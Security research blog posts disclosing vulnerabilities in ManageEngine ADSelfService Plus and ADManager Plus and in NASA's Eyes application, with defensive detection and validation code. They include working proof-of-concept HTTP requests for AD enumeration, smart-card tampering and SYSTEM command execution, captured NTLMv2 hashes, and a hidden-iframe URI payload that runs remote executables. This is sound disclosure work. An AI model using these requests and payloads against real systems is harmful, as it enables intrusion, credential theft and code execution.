Wednesday, April 11, 2018

First 0DAY ALL DAY Event Findings


The first 0DAYALLDAY event was held on April 7th, 2018 from 11am to Midnight.  It was organized by Spectant Security and the Blackmarble group (blackmarble.sh):

https://blackmarble.sh/0-day-all-day/

0DAYALLDAY is a quarterly REAL "Hack-A-Thon" where security researchers from the DFW Metroplex come together to hunt for bugs in supplied software.

The first event was invitation only to work out the kinks and observe the feasibility and logistics of future events. You can find more information directly at the 0DAYALLDAY website: https://www.0dayallday.org/

The main software Spectant targeted was the ManageEngine ADSelfService Plus installation and the ManageEngine ADManager Plus installation. The following table lists the issues found along with their risk ratings:

Software | Finding | Risk Rating
ADSelfService Plus | Unauthenticated Access to OrganizationChart.cc Allows Full AD Enumeration | High
ADSelfService Plus | ANY User Can remove and enable/disable smart cards for other users | High
ADSelfService Plus | Authenticated ADSPOPUP Domain Users, Computers, Controllers Enumeration | Medium
ADSelfService Plus | Authenticated Host and Port Enumeration | Medium
ADSelfService Plus | Admin DBBackup Remote Host Enumeration and SMB Capture | Informational
ADManager Plus | Application Admin can Run Commands as SYSTEM via User Modification Scripts | Informational

The following section describes the technical details for each finding.

Detailed Findings

Unauthenticated Access to OrganizationChart.cc Allows Full AD Enumeration

Software | Finding | Risk Rating
ADSelfService Plus | Unauthenticated Access to OrganizationChart.cc Allows Full AD Enumeration | High

The default installation of ManageEngine's ADSelfService Plus application allows anyone to search for employees or view an organizational chart. By sending the following unauthenticated request, an attacker can enumerate the entire domain:


GET /OrganizationChart.cc?methodToCall=show&selectedTab=dash HTTP/1.1
Host: 127.0.0.1:7777
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:7777/authorization.do
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1


Rendered in the browser, the chart shows basic information about each user and the domain that user is associated with.

However, by viewing the returned HTML source code for the OrganizationChart.cc request much more detailed information is available about the underlying AD structure:


<div style="padding:3px 5px;" id="CN=Administrator,CN=Users,DC=blackmarble,DC=sh" domainname="blackmarble.sh">
...
<div style="padding:3px 5px;" id="CN=Guest,CN=Users,DC=blackmarble,DC=sh" domainname="blackmarble.sh">
...
<div style="padding:3px 5px;" id="CN=DefaultAccount,CN=Users,DC=blackmarble,DC=sh" domainname="blackmarble.sh">
...


Not only can a potential attacker obtain usernames, email addresses, phone numbers, and possibly user photos of victims, they can also learn which AD domains those users are a part of and which OUs they are in. Since the Organization Chart displays a list of ALL users within the AD, a potential attacker can also determine what software is installed across the organization by observing which system and service accounts are present. All of this can be combined to build and execute a very convincing social engineering attack.

Recommendation:

As a workaround, it is recommended that "Employee Search" be disabled from the Configuration options within ADSelfService Plus. However, ManageEngine should really put this search feature behind the authentication portal in the default install.

ANY User Can remove and enable/disable smart cards for other users

Software | Finding | Risk Rating
ADSelfService Plus | ANY User Can remove and enable/disable smart cards for other users | High

While doing cross-account access testing it was discovered that the /WC/SmartCard.do application endpoint allowed even the lowest-privileged user to enable and disable any smart card configured in the system by interfacing directly with the endpoint. This is done by sending the following request:


POST /WC/SmartCard.do?mTCall=enableDisableSmartCard HTTP/1.1
Host: 127.0.0.1:7777
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:7777/HASettings.do?selectedTab=admin&selectedTile=HASettings
X-Requested-With: XMLHttpRequest
Content-type: application/x-www-form-urlencoded;charset=UTF-8
Content-Length: 79
Cookie: JSESSIONIDADSSP=00B684925C94F202DBF9139805493DD5; JSESSIONID=08C2A68C1BBF9E4E46ABE59844D3BBA3; NTLM_LOGGED_OUT=true; adscsrf=075a0424-244c-46f9-a7b4-736384aa2ad0; JSESSIONIDSSO=EBF4FB52BC685DC4A2FF9639FAF75D83
DNT: 1
Connection: close

IS_ENABLED=false&SMARTCARD_ID=1&URL=&adscsrf=075a0424-244c-46f9-a7b4-736384aa2ad0


The request above will cause the application to either enable or disable the smart card referenced with the SMARTCARD_ID parameter:


HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 132
Date: Wed, 11 Apr 2018 11:21:52 GMT
Connection: close

{"sSTATUS":"ads.admin.logon_settings.smartcard_settings.enable_disable_success","SMARTCARD_NEEDS_RESTART":false,"IS_ENABLED":false}


Recommendation:

It is recommended that only administrators or technicians with sufficient access rights be able to enable or disable smart card authentication requirements.

Authenticated ADSPOPUP Domain Users, Computers, Controllers Enumeration

Software | Finding | Risk Rating
ADSelfService Plus | Authenticated ADSPOPUP Domain Users, Computers, Controllers Enumeration | Medium

During testing it was also noted that even if the "Employee Search" option and the OrganizationChart.cc endpoint were disabled, it was still possible for the lowest-privileged users to access full User, Group, Domain, and Computer/System lists from the /ADSPopupAction.do application endpoint.

This endpoint contains a method called getDataModelUIDesign that expects a JSON parameter string in a POST request. Within the JSON parameter, an objectTypeId selects whether Users, Groups, Domains, or Computers/Systems are enumerated. This is demonstrated by sending the following request with objectTypeId 2:


POST /ADSPopupAction.do?methodToCall=getDataModelUIDesign HTTP/1.1
Host: 127.0.0.1:7777
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:7777/RestrictUsers.do?methodToCall=generate&action=staleAccountPage&init=true&selectedTab=admin&selectedTile=RestrictUsersSettings&domains=DC=blackmarble,DC=sh&domainName=blackmarble.sh
X-Requested-With: XMLHttpRequest
Content-type: application/x-www-form-urlencoded;charset=UTF-8
Content-Length: 261
Cookie: JSESSIONIDADSSP=CF41E5FBF4EE234934E3C64D4211352E; JSESSIONID=2662D4981ACCAB8ACDA820D139269C7E; NTLM_LOGGED_OUT=true; JSESSIONIDSSO=C77D3B15E0F4DB4A094B7303DF810027; adscsrf=969db194-807f-48d8-b8ff-63668b69b927;
DNT: 1
Connection: close

params={"popupId":5,"objectTypeId":2,"viewModelId":11,"domainName":"blackmarble.sh","allDomains":false,"isForestDomainsOnly":false,"colFilter":{},"popupDataModelId":11,"searchText":"","start":1,"end":100,"range":100}&adscsrf=969db194-807f-48d8-b8ff-63668b69b927


The request above returns a list of users and their corresponding domain.

Changing the objectTypeId to 4 in the same request returns a full list of systems associated with the AD domain, including which systems are the designated Domain Controllers.


Recommendation:

It is recommended that only administrators or technicians with sufficient access rights be able to access any potentially sensitive objectTypeIds.

Authenticated Host and Port Enumeration

Software | Finding | Risk Rating
ADSelfService Plus | Authenticated Host and Port Enumeration | Medium

One of the more interesting endpoints discovered during testing was the /JumpToAction.do application endpoint. This endpoint contains a method called testConnection that expects a parameter called URL. If an IP/URL and PORT combination is supplied, the application attempts to connect to that host and port and returns success or failure depending on the status of the connection:


POST /JumpToAction.do?mTCall=testConnection HTTP/1.1
Host: 127.0.0.1:7777
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:7777/HASettings.do?selectedTab=admin&selectedTile=HASettings
X-Requested-With: XMLHttpRequest
Content-type: application/x-www-form-urlencoded;charset=UTF-8
Content-Length: 73
Cookie: JSESSIONIDADSSP=2C1D14504E2E15CB00C7BD5F14D6BE17; JSESSIONID=2662D4981ACCAB8ACDA820D139269C7E; NTLM_LOGGED_OUT=true; adscsrf=7094a261-8a15-4492-ac0c-75b35a539700; JSESSIONIDSSO=8057D2014941CAC8031120C1E346B3C1
DNT: 1
Connection: close

URL=http://[REDACTED]:22/&adscsrf=7094a261-8a15-4492-ac0c-75b35a539700


The request above causes the system to check whether port 22 is open on host [REDACTED]. Since this port is open, it returns "success":


HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 9
Date: Wed, 11 Apr 2018 12:24:07 GMT
Connection: close

success


Combining this with the ADSPOPUP vulnerability allows the attacker to potentially fingerprint the entire network based on open ports and installed software.

Recommendation:

It is recommended that only administrators or technicians with sufficient access rights be able to access the testConnection method of the JumpToAction.do application endpoint.
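
Monitoring the three enumeration endpoints above (OrganizationChart.cc, ADSPopupAction.do and the testConnection method of JumpToAction.do) from the server's access log is one practical detection while waiting on a vendor fix. The following is an added example, not code from the event or from ManageEngine; it assumes a Tomcat-style common log format and uses constructed log lines with documentation addresses.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Endpoints from the findings above.  value = (threshold, window_seconds): more than
# `threshold` hits from one client inside the window raises an alert; a threshold of 0
# reports every hit (appropriate for OrganizationChart.cc once Employee Search is disabled).
WATCHED = {
    "OrganizationChart.cc": (0, 0),
    "JumpToAction.do?mTCall=testConnection": (5, 60),
    "ADSPopupAction.do?methodToCall=getDataModelUIDesign": (5, 60),
}

# Tomcat/Apache common log format: client - - [timestamp] "METHOD path HTTP/x" status bytes
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

def parse_line(line):
    """Return (client_ip, timestamp, method, path, status) or None for a non-matching line."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), ts, m.group("method"), m.group("path"), int(m.group("status"))

def detect(lines):
    """Return [(client_ip, endpoint_key, hits_in_window)] alerts, in the order they fire."""
    alerts = []
    windows = defaultdict(deque)          # (ip, endpoint) -> timestamps inside the window
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts, _method, path, _status = rec
        for key, (threshold, window) in WATCHED.items():
            if key not in path:
                continue
            if threshold == 0:
                alerts.append((ip, key, 1))
                continue
            q = windows[(ip, key)]
            q.append(ts)
            while ts - q[0] > timedelta(seconds=window):
                q.popleft()
            if len(q) == threshold + 1:   # fire once, when the threshold is first crossed
                alerts.append((ip, key, len(q)))
    return alerts

# Constructed sample log: one hit on the unauthenticated chart, a burst of testConnection
# probes from one client, and a single benign ADSPopupAction call from another.
SAMPLE_LOG = """\
192.0.2.10 - - [07/Apr/2018:14:02:01 -0500] "GET /OrganizationChart.cc?methodToCall=show&selectedTab=dash HTTP/1.1" 200 48211
192.0.2.20 - - [07/Apr/2018:14:05:10 -0500] "POST /JumpToAction.do?mTCall=testConnection HTTP/1.1" 200 9
192.0.2.20 - - [07/Apr/2018:14:05:11 -0500] "POST /JumpToAction.do?mTCall=testConnection HTTP/1.1" 200 9
192.0.2.20 - - [07/Apr/2018:14:05:12 -0500] "POST /JumpToAction.do?mTCall=testConnection HTTP/1.1" 200 9
192.0.2.20 - - [07/Apr/2018:14:05:13 -0500] "POST /JumpToAction.do?mTCall=testConnection HTTP/1.1" 200 9
192.0.2.20 - - [07/Apr/2018:14:05:14 -0500] "POST /JumpToAction.do?mTCall=testConnection HTTP/1.1" 200 9
192.0.2.20 - - [07/Apr/2018:14:05:15 -0500] "POST /JumpToAction.do?mTCall=testConnection HTTP/1.1" 200 9
192.0.2.30 - - [07/Apr/2018:14:06:00 -0500] "POST /ADSPopupAction.do?methodToCall=getDataModelUIDesign HTTP/1.1" 200 3120
"""

if __name__ == "__main__":
    for ip, endpoint, hits in detect(SAMPLE_LOG.splitlines()):
        print(f"ALERT {ip} -> {endpoint} ({hits} hits)")
```

The POST body (and therefore the probed host and port) is not in the access log, so the testConnection rule keys on request rate per client rather than on targets.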

Admin DBBackup Remote Host Enumeration and SMB Capture

Software | Finding | Risk Rating
ADSelfService Plus | Admin DBBackup Remote Host Enumeration and SMB Capture | Informational

While testing the application it was noted that the admin account for the ADSelfService Plus application could execute database backups. This account could specify the local system path used for storing the database backups. The application does not validate that the path supplied by the admin is a valid local system path and will attempt to access any path supplied.

Using this knowledge, it is possible for an attacker with admin privileges to supply a remote UNC path for the database backup to be stored in. This causes the system to attempt to authenticate to the remote, attacker-supplied system. During this attempted authentication the NTLMv2 hash can be retrieved:


[SMB] NTLMv2-SSP Client : [REDACTED]
[SMB] NTLMv2-SSP Username : BLACKMARBLE\MANAGEENGINE-01$
[SMB] NTLMv2-SSP Hash : MANAGEENGINE-01$::BLACKMARBLE:1122334455667788:57AB85[...SNIP...]380032002E8000000000000000000
[SMB] Requested Share : \\[REDACTED]\IPC$

[SMB] Requested Share : \\[REDACTED]\TEST2
[SMB] NTLMv2-SSP Client : [REDACTED]
[SMB] NTLMv2-SSP Username : BLACKMARBLE\Administrator
[SMB] NTLMv2-SSP Hash : Administrator::BLACKMARBLE:1122334455667788:D7446276CF[...SNIP...]3100330038000000000000000000


Recommendation:

It is recommended that the application verify that the administrator is only supplying local system paths.
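
The recommendation above amounts to an allowlist check on the backup path. The following is an added example of that check, not ManageEngine's code; it assumes a fixed backup root (C:\adssp_backups, a placeholder) and refuses every spelling of a UNC or device path before the service could open an outbound SMB session to it.

```python
from pathlib import PureWindowsPath

# Placeholder backup root for this example; the product's real install directory is not
# given on the page, so substitute the directory the service is configured to write to.
BACKUP_ROOT = r"C:\adssp_backups"

def is_local_backup_path(path: str, root: str = BACKUP_ROOT) -> bool:
    r"""Accept only an absolute, drive-letter path located beneath `root`.

    Every spelling that would make the service open an outbound SMB session is refused:
    \\server\share, //server/share, \\?\UNC\server\share, \\.\device, and '..' traversal
    out of the root.  A mapped network drive letter would still pass the drive check, which
    is why the path must also sit under one fixed root on a local disk.
    """
    if not path or any(ord(c) < 32 for c in path):
        return False
    if path.startswith(("\\\\", "//", "\\/", "/\\")):
        return False                          # UNC and device-namespace forms
    p = PureWindowsPath(path)
    drive = p.drive
    if len(drive) != 2 or not drive[0].isalpha() or drive[1] != ":":
        return False                          # no plain drive letter: UNC-style or relative
    if p.root != "\\":
        return False                          # "C:folder" has a drive but no root
    if any(part == ".." or ":" in part for part in p.parts[1:]):
        return False                          # traversal, or an alternate data stream
    root_parts = [s.lower() for s in PureWindowsPath(root).parts]
    cand_parts = [s.lower() for s in p.parts]
    return cand_parts[:len(root_parts)] == root_parts

if __name__ == "__main__":
    for candidate in (r"C:\adssp_backups\nightly", r"\\192.0.2.10\TEST2",
                      r"C:\adssp_backups\..\Windows\Temp"):
        print(f"{candidate!r}: {'allowed' if is_local_backup_path(candidate) else 'rejected'}")
```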

Application Admin can Run Commands as SYSTEM via User Modification Scripts

Software | Finding | Risk Rating
ADManager Plus | Application Admin can Run Commands as SYSTEM via User Modification Scripts | Informational

It was noted during testing that there is a section of the user modification form where the admin can supply a custom script that executes immediately. By sending the following request:


POST /ExecuteForm.do?methodToCall=submitExecuteLayout&templateCategoryId=6&isWorkFlowMode=false HTTP/1.1
Host: 127.0.0.1:7778
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:7778/ExecuteForm.do?methodToCall=init&operation=singleModify&templateCategoryId=6&guid={E034A7E7-0ED8-4761-82A0-C92E3304F943}&domainName=blackmarble.sh
X-Requested-With: XMLHttpRequest
Content-type: application/x-www-form-urlencoded;charset=UTF-8
Content-Length: 146672
Cookie: JSESSIONIDADSSP=973B256F550EEAF12D8858EC8C3D1601; JSESSIONID=70D75AB6A980017519AE98671F18838A; NTLM_LOGGED_OUT=true; JSESSIONIDSSO=DC158F7DF0B24F4DC0A4884CAD8C74CD; adscsrf=b398f7f6-226a-40d2-94dd-eec6f79759e1; CUSTOM_SSO_TICKET=1523459129211; CUSTOM_SSO_APP_NAME="ManageEngine ADManager Plus"; CUSTOM_SSO_APP_TAG_NAME=ADMP; APPS_PANE_LOADED=true
DNT: 1
Connection: close

FcExecuteLayout= ...[SNIP]...
{"tabId":"32","tabName":"Custom%20Attributes","layoutId":"8","tabSeq":"7","isO365Tab":"false","description":"description","isHidden":"false","FcRhsLayoutSubTabGroup":[{"tabId":"32","subTabGroupId":"32","subTabGroupName":"Custom%20Attributes","isOptionTab":"false","isCustomTab":"true","optionTabType":"","FcRhsLayoutSubTab":[{"subTabId":"37","subTabGroupId":"32","subTabName":"Custom%20Attributes","subTabType":"","isDefaultSelectedSubTab":"false","isHidden":"true","lhsSubTabId":"18","fieldGroupsStatusMsg":"No%20Field%20Groups%20are%20available.","FcRhsLayoutFieldGroup":[{"fieldGroupId":"55","subTabId":"37","fieldGroupName":"Custom%20Attributes","description":"Description","fieldGroupSeq":"1","isSingleColumn":"false","isHidden":"false","FcRhsLayoutField":[{"ComponentVals":{"scriptEnabled":true,"scriptCommand":"whoami","ignoreWarning":true},"AvoidDuplicationDetails":{"duplicationLevel":"","isApplyNamingFormat":"false","stopExecution":"false","isAppendingNumber":"true","isAppendCharsSpecified":"false","appendStartIndex":"2","suffixLength":"2","fillingChars":"0","formatId":"-1"},"layoutFieldId":"245","fieldGroupId":"55","fieldId":"2616","componentId":"57","attribSeq":"1","isHidden":"false","position":"RHS","attribDisplayText":"Custom%20Script","defaultValue":"","isMandatory":"false","isReadOnly":"false","isEnabledForBulkEdit":"false","isAvoidDuplication":"false","isImmdeiateDuplicationCheck":"false","isCustomField":"false","minLen":"2","maxLen":"255","systemRestrictedLength":"255","helpText":"","isDomainSpecificField":"false","domainSpecificDataProviderClassName":"","validationIds":"","isAvailableInTemplate":"true","isRestricted":"false","isAuthorized":"true","isComponentLevelAuthorized":"false","iamAppId":"1","parentFieldId":"0","childFieldArr":[]}]}]}]}]}]}&templateId=8&isCopiedObject=false&isDirectCopyObject=false&isOverWriteADValue=true&adscsrf=b398f7f6-226a-40d2-94dd-eec6f79759e1


This request (redacted for length) causes the application to immediately execute the "whoami" command and respond with the output of that command:


HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
expires: 1970-01-01 05:30:00
pragma: no-cache
cache-control: no-cache, no-store
Strict-Transport-Security: max-age=31536000 ; includeSubDomains
Content-Type: text/html;charset=UTF-8
Date: Wed, 11 Apr 2018 15:07:25 GMT
Connection: close
Content-Length: 197494


...[SNIP]...

</table></td> <td width="10%" valign="top" align="right"><a class="linkblacktxt" href="javascript:hideStatusTable();"><img src="images/delete.gif" width="9" height="9" border="0"> Close</a><td></tr> <tr><td colspan="2" align="center"><span align="center" class="blacktxt">Custom script result: nt authority\system </span></span></td></tr></table></td> <td background="images/blue/gray_right_bgline.gif"><img src="images/blue/gray_right_bgline.gif" width="6" height="1"></td></tr><tr><td width="6" height="6" valign="top"><img src="images/blue/gray_botleft_curve.gif" width="6" height="6"></td> <td height="6" background="images/blue/gray_bot_bgline.gif"><img src="images/blue/gray_bot_bgline.gif" width="1" height="6"></td> <td width="6" height="6" valign="top"><img src="images/blue/gray_botright_curve.gif" width="6" height="6"></td></tr></table></td></tr></table><br></div>

Recommendation:

Since this is purely an informational finding, noted only to help anyone who may stumble upon an admin account for this application during a penetration test, there is no real recommendation. However, the product should offer the ability to disable this functionality and/or to use a different system-level account, chosen during installation, to prevent potential system compromise.

Monday, July 17, 2017

Client Side Remote Code execution in NASA's Eyes Application


Spectant Security analyzed the application during installation as well as during its normal functioning window. The following section details the activities and actions performed during the research.

During standard User Interface (UI) research the NASA's Eyes web site (eyes.nasa.gov) was discovered and viewed. It was noted that a custom application was used along with a custom "eyes://" URI linked off the various pages of the web site. The eyes:// URI along with the underlying launcher and viewer application were analyzed for potential weaknesses in their security.

Once installed, the NASA's Eyes application appears to be a Qt GUI wrapper around the Unity player. The URIs used to launch the application are structured as follows (Textbox 1):


eyes:///?scene=$SERVERURL/content/scenes/default.xml&interface=$SERVERURL/content/interface/default/default.xml&document=$SERVERURL/content/documents/cassini/cassini.xml

Textbox 1: Raw URI string to launch the NASA's Eyes Application from a web site

$SERVERURL isn't set anywhere on the site and is pre-configured within the viewer. You can see this from within the extremely verbose output_log.txt file in the AppData path of the viewer (Textbox 2):


Replacements
$SERVERURL -> http://eyes.nasa.gov/server
$PROTOCOL -> eyesReplacements

Textbox 2: Raw output_log.txt output showing the $SERVERURL parameter

Also in the output_log.txt file is a list of retrieved files that the viewer uses for building the various models and animations for the application (Textbox 3):


Successfully downloaded and parsed 'http://eyes.nasa.gov/server/content/interface/default/default.xml'
Successfully downloaded and parsed 'http://eyes.nasa.gov/server/content/documents/cassini/basic_camerawork.xml'
Successfully downloaded and parsed 'http://eyes.nasa.gov/server/content/documents/cassini/advanced_camerawork.xml'
Successfully downloaded and parsed 'http://eyes.nasa.gov/server/content/documents/cassini/control_scripts.xml'
Successfully downloaded and parsed 'http://eyes.nasa.gov/server/content/documents/cassini/timeline_hds_2.xml'
Successfully downloaded and parsed 'http://eyes.nasa.gov/server/content/documents/cassini/calendar_hds.xml'
Successfully downloaded and parsed 'http://eyes.nasa.gov/server/content/documents/cassini/gallery_hds_2.xml'
Successfully downloaded and parsed 'http://eyes.nasa.gov/server/content/documents/cassini/styles.xml'

Textbox 3: Raw output_log.txt output showing resources downloaded over HTTP

One interesting thing to note is that during testing all the resource files used within the application were accessed and downloaded over HTTP instead of HTTPS.

The downloaded resource files were analyzed to determine if there was anything that could be modified to gain access to the underlying system running the browser/NASA's Eyes application.

During this analysis, it was discovered that the application doesn't store the files in their default format. Instead, it creates another directory in a different AppData path and stores them with unpredictable names in a cache folder along with an index.csv to manage the naming translations. Wireshark was used to verify that the downloaded files were still being served via HTTP (Image 1):


Image 1: Wireshark Screenshot showing resources being downloaded over HTTP

This confirmed the use of the Unity player as well as files being downloaded over HTTP. It also confirmed the use of a Qt GUI built on QtWebKit.

The next step was to attempt to serve a custom XML document via the eyes:// URI string to see whether the player would perform any validation on it and/or attempt to render it. The following is a simple HTML page that attempts to make the NASA's Eyes application launch and render a custom XML resource (Textbox 4):


<html>
<head>
</head>
<body>
<!-- hidden frame whose src is the eyes:// URI; the document parameter points at a third-party XML resource -->
<iframe style="width:0px; height:0px;" src="eyes:///?scene=$SERVERURL/content/scenes/default.xml&interface=$SERVERURL/content/interface/default/default.xml&document=http://127.0.0.1/eye_test.xml"></iframe>
</body>
</html>

Textbox 4: Example HTML file that will launch the NASA's Eyes application with 3rd party resource

By accessing this page in a browser, the launcher starts automatically and all the XML files are rendered correctly, including the one served from the local host, as evidenced by the output_log.txt file (Textbox 5):


Successfully downloaded and parsed 'http://127.0.0.1/eye_test.xml'

Textbox 5: Raw output_log.txt output showing the download and render of 3rd party resource

The eye_test.xml file was modified to attempt to execute the Windows CALC.EXE application (Image 2):


Image 2: Resource modification to execute CALC.EXE on target machine

When the viewer loaded, CALC.EXE was executed once the scene had been rendered (Image 3):


Image 3: Screenshot of CALC.EXE being executed on target machine

Using Process Monitor it was discovered that the OpenURL call eventually landed on a rundll32.exe call which loaded url.dll with the FileProtocolHandler function (Textbox 6):


PID: 756, Command line: "C:\Windows\System32\rundll32.exe" url.dll,FileProtocolHandler file:///C:/WINDOWS/System32/calc.exe

Parent PID: 9188, Command line: "C:\Windows\System32\rundll32.exe" url.dll,FileProtocolHandler file:///C:/WINDOWS/System32/calc.exe

Textbox 6: Process Monitor output showing the rundll32 call from the NASA's Eyes application

Now that we know we can control the URI handler and the full path that gets passed to url.dll via rundll32.exe, code can be executed on the machine running the launcher by pointing the custom resource at an executable on a remote Windows/SMB share (Image 4):


Image 4: Resource modification to execute a remote TEST.EXE on target machine

Once that XML file is rendered, the launcher will download and execute the test.exe application on the target machine (Image 5):


Image 5: Screenshot of TEST.EXE being executed on the target machine
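
The rundll32 invocation in Textbox 6 is a useful detection anchor for defenders: url.dll,FileProtocolHandler launches that point at an executable, or at a remote share, are rare in normal use. The following is an added example, not part of the original research, that classifies such launches from process-creation records in the same layout as Textbox 6; the sample events are constructed and 192.0.2.10 is a documentation address.

```python
import re
from urllib.parse import unquote

# The invocation shape recorded in Textbox 6: rundll32.exe url.dll,FileProtocolHandler <target>
HANDLER_RE = re.compile(
    r'rundll32(?:\.exe)?"?\s+url\.dll,\s*FileProtocolHandler\s+(?P<target>\S+)', re.IGNORECASE)
PID_RE = re.compile(r"PID:\s*(\d+)")
EXEC_EXT = (".exe", ".dll", ".scr", ".com", ".bat", ".cmd", ".ps1", ".js", ".vbs", ".hta", ".msi")

def classify_target(target: str):
    """Reasons a FileProtocolHandler argument deserves attention; an empty list means benign."""
    norm = unquote(target.strip('"')).replace("\\", "/")
    if norm.lower().startswith("file:"):
        norm = norm[5:]
    if norm.startswith("///"):               # file:///C:/... : local path
        host, path = "", norm[3:]
    elif norm.startswith("//"):              # file://host/share/... or \\host\share\... : UNC
        host, _, path = norm[2:].partition("/")
    else:                                    # bare local path such as C:\...
        host, path = "", norm
    reasons = []
    if host and host.lower() != "localhost":
        reasons.append("remote host: " + host)
    if path.lower().endswith(EXEC_EXT):
        reasons.append("executable target: " + path.rsplit("/", 1)[-1])
    return reasons

def scan_process_events(lines):
    """Return [(pid, target, reasons)] for every url.dll handler launch that is suspicious."""
    alerts = []
    for line in lines:
        m = HANDLER_RE.search(line)
        if not m:
            continue
        reasons = classify_target(m.group("target"))
        if reasons:
            pid = PID_RE.search(line)
            alerts.append((int(pid.group(1)) if pid else -1, m.group("target"), reasons))
    return alerts

# Constructed events in the Textbox 6 layout: the page's calc.exe launch, a launch from a
# remote share (192.0.2.10 is a documentation address), a benign document open, and noise.
SAMPLE_EVENTS = r"""
PID: 756, Command line: "C:\Windows\System32\rundll32.exe" url.dll,FileProtocolHandler file:///C:/WINDOWS/System32/calc.exe
PID: 812, Command line: "C:\Windows\System32\rundll32.exe" url.dll,FileProtocolHandler file://192.0.2.10/share/test.exe
PID: 901, Command line: "C:\Windows\System32\rundll32.exe" url.dll,FileProtocolHandler file:///C:/Users/alice/Documents/mission.pdf
PID: 955, Command line: "C:\Windows\System32\notepad.exe" notes.txt
"""

if __name__ == "__main__":
    for pid, target, reasons in scan_process_events(SAMPLE_EVENTS.splitlines()):
        print(f"PID {pid}: {target} -> {', '.join(reasons)}")
```

Pairing this with the parent process (the viewer rather than a shell or Explorer, per the Parent PID line in Textbox 6) narrows the rule further once the viewer's executable name is known in a given environment.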

Recommendations


It is recommended that all external resources be loaded over SSL with certificate validation from within the client application. It is also recommended to add a configuration file with approved external resource locations.
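
The recommendation above (approved resource locations, fetched over validated HTTPS) can be enforced at the point where the viewer parses the eyes:// URI, before any download starts. The following is an added example, not NASA's code; it assumes that eyes.nasa.gov over HTTPS, under /server/content/, is the only approved location, and vets the URIs from Textbox 1 and Textbox 4.

```python
from urllib.parse import urlsplit, parse_qs

# From Textbox 2: the viewer substitutes $SERVERURL before fetching; the logged base is HTTP.
SERVER_URL = "http://eyes.nasa.gov/server"
# Assumed hardened policy for this example (not NASA's configuration): HTTPS to the one
# approved host, and only paths under the content tree the viewer actually uses.
ALLOWED_HOST = "eyes.nasa.gov"
ALLOWED_PATH_PREFIX = "/server/content/"
RESOURCE_KEYS = ("scene", "interface", "document")

def expand_server_url(value: str) -> str:
    """Substitute $SERVERURL the way the viewer does, but with the HTTPS form of the base."""
    https_base = "https://" + SERVER_URL.split("://", 1)[1]
    return value.replace("$SERVERURL", https_base)

def resource_allowed(url: str) -> bool:
    """True only for https://<approved host>/server/content/... with no '..' segments."""
    u = urlsplit(url)
    return (u.scheme == "https"
            and u.netloc.lower() == ALLOWED_HOST      # also rejects user@host and host:port tricks
            and u.path.startswith(ALLOWED_PATH_PREFIX)
            and ".." not in u.path.split("/"))

def vet_eyes_uri(uri: str):
    """Split an eyes:// URI into the resources a hardened viewer may fetch and those it must refuse."""
    parts = urlsplit(uri)
    if parts.scheme != "eyes":
        raise ValueError("not an eyes:// URI")
    query = parse_qs(parts.query, keep_blank_values=True)
    accepted, rejected = {}, {}
    for key, values in query.items():
        for raw in values:
            url = expand_server_url(raw)
            # Unknown parameter names are refused outright; the viewer needs only the three known ones.
            if key in RESOURCE_KEYS and resource_allowed(url):
                accepted[key] = url
            else:
                rejected[key] = url
    return accepted, rejected

# Textbox 1 (all three resources on $SERVERURL) and Textbox 4 (document pointed at the local host).
ORIGINAL_URI = ("eyes:///?scene=$SERVERURL/content/scenes/default.xml"
                "&interface=$SERVERURL/content/interface/default/default.xml"
                "&document=$SERVERURL/content/documents/cassini/cassini.xml")
THIRD_PARTY_URI = ("eyes:///?scene=$SERVERURL/content/scenes/default.xml"
                   "&interface=$SERVERURL/content/interface/default/default.xml"
                   "&document=http://127.0.0.1/eye_test.xml")

if __name__ == "__main__":
    for uri in (ORIGINAL_URI, THIRD_PARTY_URI):
        ok, bad = vet_eyes_uri(uri)
        print("accepted:", sorted(ok), "rejected:", bad)
```

Certificate validation on the HTTPS fetch itself is a separate control in the HTTP client and is not shown here.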

Disclosure Timeline


4/27/2017 - Contacted NASA's Eyes Site Administrator - No Response
4/28/2017 - Called NASA SOC for Identified Security Issues - Was told to submit report to SOC
4/28/2017 - Sent Vulnerability Report to NASA SOC - No Response
5/02/2017 - Follow Up Requesting Response - No Response
7/27/2017 - Publish Findings